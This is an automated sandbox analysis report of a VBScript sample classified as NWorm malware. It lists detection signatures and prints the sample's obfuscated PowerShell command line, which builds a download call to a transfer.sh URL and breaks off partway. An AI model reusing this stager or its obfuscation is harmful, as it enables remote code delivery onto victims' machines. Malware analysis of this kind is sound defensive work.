Edit tour
Windows
Analysis Report
YBAXAKQXVYWIXQJDE.VBS
Overview
General Information
Detection
NWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected NWorm
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Creates processes via WMI
Suspicious powershell command line found
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Obfuscated command line found
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Sigma detected: Powerup Write Hijack DLL
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Change PowerShell Policies to an Unsecure Level
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
- wscript.exe (PID: 7032 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\D esktop\YBA XAKQXVYWIX QJDE.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- powershell.exe (PID: 7112 cmdline:
POWERSHELL $Hx = 'ht tps://tran sfer.sh/ge t/8J0O0I/S erver435.t xt';$HB=(' {2}{0}{1}' -f')/8+&! 9]]}039(3^ <67)075^65 5$1$57]#*1 {2#^&71!9@ #1@8&4#\)$ {=^#7[[%_3 6]22=\{=44 6}8}-52{]1 }<-482&10_ !*_l)/8+&! 9]]}039(3^ <67)075^65 5$1$57]#*1 {2#^&71!9@ #1@8&4#\)$ {=^#7[[%_3 6]22=\{=44 6}8}-52{]1 }<-482&10_ !*_o)/8+&! 9]]}039(3^ <67)075^65 5$1$57]#*1 {2#^&71!9@ #1@8&4#\)$ {=^#7[[%_3 6]22=\{=44 6}8}-52{]1 }<-482&10_ !*_a)/8+&! 9]]}039(3^ <67)075^65 5$1$57]#*1 {2#^&71!9@ #1@8&4#\)$ {=^#7[[%_3 6]22=\{=44 6}8}-52{]1 }<-482&10_ !*_d)/8+&! 9]]}039(3^ <67)075^65 5$1$57]#*1 {2#^&71!9@ #1@8&4#\)$ {=^#7[[%_3 6]22=\{=44 6}8}-52{]1 }<-482&10_ !*_'.Repla ce(')/8+&! 9]]}039(3^ <67)075^65 5$1$57]#*1 {2#^&71!9@ #1@8&4#\)$ {=^#7[[%_3 6]22=\{=44 6}8}-52{]1 }<-482&10_ !*_',''),' 67&/!^)!+} &8<^+)3{2* )974\{+@-$ $-)53(86+9 9+558]9*[@ 7]911\1#1& }8*9#-)[#3 #\4{0/52[2 &4*%)46 (}55$15]-s 67&/!^)!+} &8<^+)3{2* )974\{+@-$ $-)53(86+9 9+558]9*[@ 7]911\1#1& }8*9#-)[#3 #\4{0/52[2 &4*%)46 (}55$15]-t 67&/!^)!+} &8<^+)3{2* )974\{+@-$ $-)53(86+9 9+558]9*[@ 7]911\1#1& }8*9#-)[#3 #\4{0/52[2 &4*%)46 (}55$15]-r 67&/!^)!+} &8<^+)3{2* )974\{+@-$ $-)53(86+9 9+558]9*[@ 7]911\1#1& }8*9#-)[#3 #\4{0/52[2 &4*%)46 (}55$15]-i 67&/!^)!+} &8<^+)3{2* )974\{+@-$ $-)53(86+9 9+558]9*[@ 7]911\1#1& }8*9#-)[#3 #\4{0/52[2 &4*%)46 (}55$15]-n 67&/!^)!+} &8<^+)3{2* )974\{+@-$ $-)53(86+9 9+558]9*[@ 7]911\1#1& }8*9#-)[#3 #\4{0/52[2 &4*%)46 (}55$15]-g 67&/!^)!+} &8<^+)3{2* )974\{+@-$ $-)53(86+9 9+558]9*[@ 7]911\1#1& }8*9#-)[#3 #\4{0/52[2 &4*%)46 (}55$15]-' .Replace(' 67&/!^)!+} &8<^+)3{2* )974\{+@-$ $-)53(86+9 9+558]9*[@ 7]911\1#1& }8*9#-)[#3 #\4{0/52[2 &4*%)46 (}55$15]-' ,''),'%8$5 -<0-^+3-/* <1+=62}91= 8^*-/!9}99 @}4<-#]{<\ 1#)965=0<} \68+\8#*}6 $9^_66]=/- 6104=}]0({ (/[$@7(#3^ <!<}%D%8$5 -<0-^+3-/* <1+=62}91= 8^*-/!9}99 @}4<-#]{<\ 1#)965=0<} \68+\8#*}6 $9^_66]=/- 6104=}]0({ (/[$@7(#3^ <!<}%o%8$5 -<0-^+3-/* <1+=62}91= 8^*-/!9}99 @}4<-#]{<\ 1#)965=0<} \68+\8#*}6 $9^_66]=/- 6104=}]0({ (/[$@7(#3^ <!<}%w%8$5 -<0-^+3-/* <1+=62}91= 8^*-/!9}99 @}4<-#]{<\ 1#)965=0<} \68+\8#*}6 $9^_66]=/- 6104=}]0({ (/[$@7(#3^ <!<}%n%8$5 -<0-^+3-/* <1+=62}91= 8^*-/!9}99 @}4<-#]{<\ 1#)965=0<} \68+\8#*}6 $9^_66]=/- 6104=}]0({ (/[$@7(#3^ <!<}%'.Rep lace('%8$5 -<0-^+3-/* <1+=62}91= 8^*-/!9}99 @}4<-#]{<\ 1#)965=0<} \68+\8#*}6 $9^_66]=/- 6104=}]0({ (/[$@7(#3^ <!<}%','') );$HBB=('{ 2}{0}{1}' -f')/8+&!9 ]]}039(3^< 67)075^655 $1$57]#*1{ 2#^&71!9@# 1@8&4#\)${ =^#7[[%_36 ]22=\{=446 }8}-52{]1} <-482&10_! *_e)/8+&!9 ]]}039(3^< 67)075^655 $1$57]#*1{ 2#^&71!9@# 1@8&4#\)${ =^#7[[%_36 ]22=\{=446 }8}-52{]1} <-482&10_! *_b)/8+&!9 ]]}039(3^< 67)075^655 $1$57]#*1{ 2#^&71!9@# 1@8&4#\)${ =^#7[[%_36 ]22=\{=446 }8}-52{]1} <-482&10_! *_C)/8+&!9 ]]}039(3^< 67)075^655